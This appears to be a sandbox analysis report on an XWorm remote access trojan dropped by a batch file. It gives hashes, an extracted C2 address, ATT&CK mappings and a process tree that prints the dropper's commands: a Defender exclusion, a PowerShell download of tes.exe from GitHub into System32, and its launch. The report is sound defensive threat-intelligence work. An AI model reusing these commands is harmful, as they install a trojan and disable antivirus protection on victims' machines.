xworm | bf2edb2090118c826cb7fb3d3c7cbda1066bceaeaff02874d94f9ae940f2f09c

General

Target

@echo off.bat
Size

2KB
MD5

1454db52a096ed81ab7ca936367ceabd
SHA1

25c32881677a892e4b9bc7d45d387bec22847685
SHA256

bf2edb2090118c826cb7fb3d3c7cbda1066bceaeaff02874d94f9ae940f2f09c
SHA512

a895401536357a07d9bd9167f5c36152a8e06c68bf6967b8540493c51fc1f8cfd4bd60cf68a094ebddf33e272c3c39fa753952bba3c0ca0cc39bfc1e939792c7

Score

10^/10

xworm defense_evasion execution privilege_escalation rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

fEkivyZANGvej5MK

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023d50-26.dat	family_xworm
behavioral1/memory/2524-28-0x0000000000080000-0x000000000008E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
42	1752	powershell.exe
44	1752	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2624	powershell.exe
1752	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
44	1752	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2524	tes.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
43	raw.githubusercontent.com
44	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\tes.exe	powershell.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4660	cmd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2624	powershell.exe
2624	powershell.exe
2624	powershell.exe
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	2524	tes.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4752	NOTEPAD.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 2916	4676	cmd.exe	103
PID 4676 wrote to memory of 2916	4676	cmd.exe	103
PID 4676 wrote to memory of 4720	4676	cmd.exe	104
PID 4676 wrote to memory of 4720	4676	cmd.exe	104
PID 4720 wrote to memory of 3504	4720	cmd.exe	105
PID 4720 wrote to memory of 3504	4720	cmd.exe	105
PID 4720 wrote to memory of 4080	4720	cmd.exe	106
PID 4720 wrote to memory of 4080	4720	cmd.exe	106
PID 4676 wrote to memory of 2624	4676	cmd.exe	107
PID 4676 wrote to memory of 2624	4676	cmd.exe	107
PID 4676 wrote to memory of 1752	4676	cmd.exe	108
PID 4676 wrote to memory of 1752	4676	cmd.exe	108
PID 4676 wrote to memory of 4660	4676	cmd.exe	109
PID 4676 wrote to memory of 4660	4676	cmd.exe	109
PID 4660 wrote to memory of 2524	4660	cmd.exe	110
PID 4660 wrote to memory of 2524	4660	cmd.exe	110
PID 372 wrote to memory of 3652	372	cmd.exe	132
PID 372 wrote to memory of 3652	372	cmd.exe	132
PID 372 wrote to memory of 1724	372	cmd.exe	133
PID 372 wrote to memory of 1724	372	cmd.exe	133
PID 372 wrote to memory of 3056	372	cmd.exe	134
PID 372 wrote to memory of 3056	372	cmd.exe	134
PID 372 wrote to memory of 3624	372	cmd.exe	135
PID 372 wrote to memory of 3624	372	cmd.exe	135

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\@echo off.bat"
1⤵
PID:3716

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\@echo off.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4720
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
    3⤵
    PID:3504
- - C:\Windows\system32\find.exe
    find /i "MD5 hash"
    3⤵
    PID:4080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\tes.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\system32\cmd.exe
  cmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe""
  2⤵
  - Access Token Manipulation: Create Process with Token
  - Suspicious use of WriteProcessMemory
  PID:4660
- - C:\Windows\System32\tes.exe
    "C:\Windows\System32\tes.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2524

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\@echo off.bat
1⤵
- Suspicious use of FindShellTrayWindow
PID:4752

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:372
- C:\Windows\system32\certutil.exe
  certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
  2⤵
  PID:3652
- C:\Windows\system32\certutil.exe
  certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
  2⤵
  PID:1724
- C:\Windows\system32\find.exe
  find /i "MD5 hash"
  2⤵
  PID:3056
- C:\Windows\system32\certutil.exe
  certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
  2⤵
  PID:3624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Access Token Manipulation

1

T1134

Create Process with Token

1

T1134.002

Defense Evasion

Access Token Manipulation

1

T1134

Create Process with Token

1

T1134.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3fcm0z11.wer.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\tes.exe

Filesize
32KB

MD5
4fc044304cc6300f4c616587d81b0244

SHA1
2497c2a35feba85a5e7500e86f24d78b959b31b0

SHA256
882693e145705dcc3ecc52d5fd5187cdf3ae6da1c67af12e229746b0d64e9454

SHA512
d5298d83decffcca0f188b8c1a186ecbc85a8427da7feb618b403d24bb7ad05727068ed841f83bc3f1cda1cf8a56ed4fa3733e6c4731623c2e6e36675d4aa40e

Download Submit
memory/2524-28-0x0000000000080000-0x000000000008E000-memory.dmp

Filesize
56KB

Download
memory/2524-31-0x0000000000850000-0x000000000085C000-memory.dmp

Filesize
48KB

Download
memory/2624-5-0x000001703ACA0000-0x000001703ACC2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads